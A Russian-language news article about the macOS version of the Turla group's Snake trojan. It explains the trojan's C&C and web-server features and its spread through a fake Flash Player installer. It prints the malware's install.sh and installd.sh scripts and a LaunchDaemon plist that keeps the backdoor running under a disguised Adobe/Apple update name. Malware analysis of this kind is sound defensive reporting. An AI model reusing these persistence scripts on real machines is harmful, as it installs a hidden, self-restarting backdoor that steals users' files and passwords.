Snake, также известный как Turla, Uroburos и Agent.BTZ, является сложным вредоносным фреймворком для направленных атак. Ранее фреймворк был нацелен только на Windows. В 2014 году его версия появилась и на Linux-системах. Теперь же появилась и модификация для macOS.
О вирусе Snake
По мнению экспертов из Fox-IT и Palo Alto Networks, троян был разработан российской группировкой Turla. Вирус является заменой трояну Uroburos, который был уничтожен в 2014 году исследователями из G Data. Троян разработан с помощью .NET Framework, существуют версии для Windows, Mac и Linux. Версия для Windows была названа Kazuar, исходный код которой указывает на существование этого вируса для Linux. Mac-версия же получила название Snake.
Принцип работы
Данный вирус работает по известному принципу. Он обращается за командами к C&C-серверу по вшитому адресу. Особенностью этого трояна является команда remote. Она запускает web-сервер на зараженном хосте, предоставляя API для удаленных соединений. Таким образом атакующий сервер может в любое время отправлять команды вирусу.
У такого подхода есть два плюса:
- Возможность для атакующего сервера мигрировать на другой C&C-сервер.
- Вирус способен обходить некоторые решения безопасности.
Функциональность
Для версии под Windows архитектура Snake состояла из драйвера ядра, который скрывал присутствие компонентов Snake и предоставлял низкоуровневый доступ к сетям.
Версия для macOS является портом с Windows. По прежнему присутствуют ссылки в двоичном виде на проводник, Internet Explorer и именованные каналы.
Установка
Код Snake находится внутри архива Adobe Flash Player.app.zip, который является взломанной версией установщика Flash Player.
Код скрипта install.sh:
#!/bin/sh
SCRIPT_DIR=$(dirname "$0")
TARGET_PATH=/Library/Scripts
TARGET_PATH2=/Library/LaunchDaemons
cp -f "${SCRIPT_DIR}/queue" "${TARGET_PATH}/queue"
cp -f "${SCRIPT_DIR}/installdp" "${TARGET_PATH}/installdp"
cp -f "${SCRIPT_DIR}/installd.sh" "${TARGET_PATH}/installd.sh"
cp -f "${SCRIPT_DIR}/com.adobe.update" "$TARGET_PATH2/com.adobe.update.plist"
"${TARGET_PATH}/installd.sh"
"${SCRIPT_DIR}/Install Adobe Flash Player"
exit $RCВызываемый файл installd.sh cодержит следующий код:
#!/bin/bash
SCRIPT_DIR=$(dirname "$0")
FILE="${SCRIPT_DIR}/queue#1"
PIDS=`ps cax | grep installdp | grep -o '^[ ]*[0-9]*'`
if [ -z "$PIDS" ]; then
${SCRIPT_DIR}/installdp ${FILE} n
fiОболочка скрипта проверяет, запущен ли installdp, и запускает его в обратном случае:
/Library/Scripts/installdp /Library/Scripts/queue#1 nПоддержка
Лазейка поддерживается с помощью службы LaunchDaemon:
$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist
{
"ProgramArguments" => [
0 => "/Library/Scripts/installd.sh"
]
"KeepAlive" => 1
"Label" => "com.apple.update"
"OnDemand" => 1
"POSIXSpawnType" => "Interactive"
}Влияние
Apple весьма быстро решили проблему с этим вирусом путем отмены сертификата, поэтому данный установщик не несет никакой опасности.
Однако, если вы были инфицированы, то стоит помнить, что могли быть украдены ваши файлы и пароли. В связи с этим следует очистить компьютер от вируса, а затем заменить все свои пароли.
Источник: MacRumors
